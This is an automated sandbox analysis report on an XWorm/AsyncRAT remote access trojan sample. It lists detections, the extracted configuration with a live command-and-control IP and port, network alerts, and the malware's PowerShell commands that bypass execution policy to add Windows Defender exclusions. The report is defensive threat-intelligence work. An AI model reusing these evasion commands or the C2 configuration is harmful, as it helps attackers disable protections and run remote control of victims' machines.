Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
18fvs4AVae.exe

Overview

General Information

Sample name:18fvs4AVae.exe
renamed because original name is a hash value
Original sample name:9c113da0d913a9fd2a84c5c9a71da4338e3f16a62b8215ecb7a58d10ccab524f.exe
Analysis ID:1561582
MD5:59a9510540fec35043b990deb270b139
SHA1:54d66862a4c08ebcba8029ec99d558725603f486
SHA256:9c113da0d913a9fd2a84c5c9a71da4338e3f16a62b8215ecb7a58d10ccab524f
Tags:exeuser-Chainskilabs
Infos:

Detection

AsyncRAT, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 18fvs4AVae.exe (PID: 7396 cmdline: "C:\Users\user\Desktop\18fvs4AVae.exe" MD5: 59A9510540FEC35043B990DEB270B139)
    • powershell.exe (PID: 7524 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7748 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '18fvs4AVae.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8088 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4008 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["45.141.26.170"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.4"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
18fvs4AVae.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    18fvs4AVae.exeJoeSecurity_XWormYara detected XWormJoe Security
      18fvs4AVae.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        18fvs4AVae.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x8188:$s6: VirtualBox
        • 0x80e6:$s8: Win32_ComputerSystem
        • 0x8b36:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x8bd3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x8ce8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x87e4:$cnc4: POST / HTTP/1.1

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\ProgramData\VLC_Media.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
          C:\ProgramData\VLC_Media.exeJoeSecurity_XWormYara detected XWormJoe Security
            C:\ProgramData\VLC_Media.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              C:\ProgramData\VLC_Media.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x8188:$s6: VirtualBox
              • 0x80e6:$s8: Win32_ComputerSystem
              • 0x8b36:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x8bd3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x8ce8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x87e4:$cnc4: POST / HTTP/1.1

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                  00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0x7f88:$s6: VirtualBox
                  • 0x7ee6:$s8: Win32_ComputerSystem
                  • 0x8936:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0x89d3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0x8ae8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0x85e4:$cnc4: POST / HTTP/1.1
                  00000000.00000002.2946825942.0000000002771000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                    Process Memory Space: 18fvs4AVae.exe PID: 7396JoeSecurity_XWormYara detected XWormJoe Security

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      0.0.18fvs4AVae.exe.480000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                        0.0.18fvs4AVae.exe.480000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                          0.0.18fvs4AVae.exe.480000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                            0.0.18fvs4AVae.exe.480000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                            • 0x8188:$s6: VirtualBox
                            • 0x80e6:$s8: Win32_ComputerSystem
                            • 0x8b36:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                            • 0x8bd3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                            • 0x8ce8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                            • 0x87e4:$cnc4: POST / HTTP/1.1

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\18fvs4AVae.exe", ParentImage: C:\Users\user\Desktop\18fvs4AVae.exe, ParentProcessId: 7396, ParentProcessName: 18fvs4AVae.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', ProcessId: 7524, ProcessName: powershell.exe
                            Sigma detected: Change PowerShell Policies to an Insecure Level
                            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\18fvs4AVae.exe", ParentImage: C:\Users\user\Desktop\18fvs4AVae.exe, ParentProcessId: 7396, ParentProcessName: 18fvs4AVae.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', ProcessId: 7524, ProcessName: powershell.exe
                            Sigma detected: Powershell Defender Exclusion
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\18fvs4AVae.exe", ParentImage: C:\Users\user\Desktop\18fvs4AVae.exe, ParentProcessId: 7396, ParentProcessName: 18fvs4AVae.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', ProcessId: 7524, ProcessName: powershell.exe
                            Sigma detected: Startup Folder File Write
                            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\18fvs4AVae.exe, ProcessId: 7396, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VLC_Media.lnk
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\18fvs4AVae.exe", ParentImage: C:\Users\user\Desktop\18fvs4AVae.exe, ParentProcessId: 7396, ParentProcessName: 18fvs4AVae.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', ProcessId: 7524, ProcessName: powershell.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-23T20:56:06.689976+010028528701Malware Command and Control Activity Detected45.141.26.1707000192.168.2.449738TCP
                            2024-11-23T20:56:08.027932+010028528701Malware Command and Control Activity Detected45.141.26.1707000192.168.2.449738TCP
                            2024-11-23T20:56:19.446957+010028528701Malware Command and Control Activity Detected45.141.26.1707000192.168.2.449738TCP
                            2024-11-23T20:56:30.886735+010028528701Malware Command and Control Activity Detected45.141.26.1707000192.168.2.449738TCP
                            2024-11-23T20:56:36.678510+010028528701Malware Command and Control Activity Detected45.141.26.1707000192.168.2.449738TCP
                            2024-11-23T20:56:42.292240+010028528701Malware Command and Control Activity Detected45.141.26.1707000192.168.2.449738TCP
                            2024-11-23T20:56:53.715117+010028528701Malware Command and Control Activity Detected45.141.26.1707000192.168.2.449738TCP
                            2024-11-23T20:57:00.915702+010028528701Malware Command and Control Activity Detected45.141.26.1707000192.168.2.449738TCP
                            2024-11-23T20:57:06.709253+010028528701Malware Command and Control Activity Detected45.141.26.1707000192.168.2.449738TCP
                            2024-11-23T20:57:08.789804+010028528701Malware Command and Control Activity Detected45.141.26.1707000192.168.2.449738TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-23T20:56:08.091499+010028529231Malware Command and Control Activity Detected192.168.2.44973845.141.26.1707000TCP
                            2024-11-23T20:56:19.448824+010028529231Malware Command and Control Activity Detected192.168.2.44973845.141.26.1707000TCP
                            2024-11-23T20:56:30.891652+010028529231Malware Command and Control Activity Detected192.168.2.44973845.141.26.1707000TCP
                            2024-11-23T20:56:42.296449+010028529231Malware Command and Control Activity Detected192.168.2.44973845.141.26.1707000TCP
                            2024-11-23T20:56:53.717446+010028529231Malware Command and Control Activity Detected192.168.2.44973845.141.26.1707000TCP
                            2024-11-23T20:57:00.938069+010028529231Malware Command and Control Activity Detected192.168.2.44973845.141.26.1707000TCP
                            2024-11-23T20:57:08.790805+010028529231Malware Command and Control Activity Detected192.168.2.44973845.141.26.1707000TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-23T20:56:06.689976+010028528741Malware Command and Control Activity Detected45.141.26.1707000192.168.2.449738TCP
                            2024-11-23T20:56:36.678510+010028528741Malware Command and Control Activity Detected45.141.26.1707000192.168.2.449738TCP
                            2024-11-23T20:57:06.709253+010028528741Malware Command and Control Activity Detected45.141.26.1707000192.168.2.449738TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-23T20:56:07.443101+010028559241Malware Command and Control Activity Detected192.168.2.44973845.141.26.1707000TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: 18fvs4AVae.exeAvira: detected
                            Antivirus detection for dropped file
                            Source: C:\ProgramData\VLC_Media.exeAvira: detection malicious, Label: TR/Spy.Gen
                            Found malware configuration
                            Source: 18fvs4AVae.exeMalware Configuration Extractor: Xworm {"C2 url": ["45.141.26.170"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.4"}
                            Multi AV Scanner detection for dropped file
                            Source: C:\ProgramData\VLC_Media.exeReversingLabs: Detection: 78%
                            Multi AV Scanner detection for submitted file
                            Source: 18fvs4AVae.exeReversingLabs: Detection: 78%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\ProgramData\VLC_Media.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: 18fvs4AVae.exeJoe Sandbox ML: detected
                            Sample uses string decryption to hide its real strings
                            Source: 18fvs4AVae.exeString decryptor: 45.141.26.170
                            Source: 18fvs4AVae.exeString decryptor: 7000
                            Source: 18fvs4AVae.exeString decryptor: <123456789>
                            Source: 18fvs4AVae.exeString decryptor: <Xwormmm>
                            Source: 18fvs4AVae.exeString decryptor: XWorm V5.4
                            Source: 18fvs4AVae.exeString decryptor: USB.exe
                            Source: 18fvs4AVae.exeString decryptor: %ProgramData%
                            Source: 18fvs4AVae.exeString decryptor: VLC_Media.exe
                            Source: 18fvs4AVae.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 18fvs4AVae.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 45.141.26.170:7000 -> 192.168.2.4:49738
                            Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 45.141.26.170:7000 -> 192.168.2.4:49738
                            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49738 -> 45.141.26.170:7000
                            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49738 -> 45.141.26.170:7000
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: 45.141.26.170
                            Yara detected Generic Downloader
                            Source: Yara matchFile source: 18fvs4AVae.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.18fvs4AVae.exe.480000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\ProgramData\VLC_Media.exe, type: DROPPED
                            Source: global trafficTCP traffic: 192.168.2.4:49738 -> 45.141.26.170:7000
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                            Source: Joe Sandbox ViewASN Name: SPECTRAIPSpectraIPBVNL SPECTRAIPSpectraIPBVNL
                            Source: unknownDNS query: name: ip-api.com
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.170
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficDNS traffic detected: DNS query: ip-api.com
                            Source: powershell.exe, 00000001.00000002.1797852987.000002D1B8130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                            Source: powershell.exe, 00000001.00000002.1797852987.000002D1B8130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                            Source: powershell.exe, 00000009.00000002.2034818425.000001AD38F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micr
                            Source: powershell.exe, 00000009.00000002.2034616879.000001AD38DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsVa
                            Source: powershell.exe, 00000001.00000002.1798296730.000002D1B8170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsg
                            Source: 18fvs4AVae.exe, VLC_Media.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                            Source: powershell.exe, 00000001.00000002.1791703143.000002D1AFD84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1872550418.000001CE90235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2017198373.000001AD308E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2210782431.0000016B77BC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 0000000B.00000002.2082830684.0000016B67D7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000001.00000002.1768182208.000002D19FF39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1823361318.000001CE803E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934588558.000001AD20A99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2082830684.0000016B67D7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: 18fvs4AVae.exe, 00000000.00000002.2946825942.0000000002771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1768182208.000002D19FD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1823361318.000001CE801C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934588558.000001AD20871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2082830684.0000016B67B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000001.00000002.1768182208.000002D19FF39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1823361318.000001CE803E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934588558.000001AD20A99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2082830684.0000016B67D7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: powershell.exe, 0000000B.00000002.2082830684.0000016B67D7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 00000001.00000002.1798381263.000002D1B825B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                            Source: powershell.exe, 00000001.00000002.1768182208.000002D19FD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1823361318.000001CE801C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934588558.000001AD20871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2082830684.0000016B67B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: powershell.exe, 0000000B.00000002.2210782431.0000016B77BC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 0000000B.00000002.2210782431.0000016B77BC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 0000000B.00000002.2210782431.0000016B77BC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: powershell.exe, 0000000B.00000002.2082830684.0000016B67D7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 00000001.00000002.1791703143.000002D1AFD84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1872550418.000001CE90235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2017198373.000001AD308E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2210782431.0000016B77BC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            barindex
                            Yara detected AsyncRAT
                            Source: Yara matchFile source: 18fvs4AVae.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.18fvs4AVae.exe.480000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\VLC_Media.exe, type: DROPPED
                            Contains functionality to log keystrokes (.Net Source)
                            Source: 18fvs4AVae.exe, XLogger.cs.Net Code: KeyboardLayout
                            Source: VLC_Media.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout

                            Operating System Destruction

                            barindex
                            Protects its processes via BreakOnTermination flag
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: 01 00 00 00 Jump to behavior

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: 18fvs4AVae.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.0.18fvs4AVae.exe.480000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\ProgramData\VLC_Media.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeCode function: 0_2_00007FFD9B8917710_2_00007FFD9B891771
